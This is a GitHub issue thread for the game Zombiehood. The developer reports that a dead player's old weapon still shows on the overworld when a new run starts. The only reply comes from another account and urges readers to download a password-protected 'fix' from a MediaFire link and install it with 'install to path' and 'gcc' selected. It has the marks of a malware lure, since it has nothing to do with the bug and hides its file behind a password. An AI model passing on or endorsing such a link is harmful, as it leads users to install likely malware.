### ISSUE TITLE
[BUG] Old weapon is displayed on overworld first load on replaying after death

### ISSUE THREAD

**Issue by ReflextionsDev** [ReflextionsDev/Zombiehood#124]
**Describe the bug**
When you start a new run it shows your old weapon on the overworld (just on the first load). Something's probably not getting reset right.

- **To Reproduce**
- Pickup shotgun
- Go to overworld to save new weapon
- Go to a new level
- Die
- Start a new run
- Observe player is holding shotgun

**Screenshots**
(If necessary)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
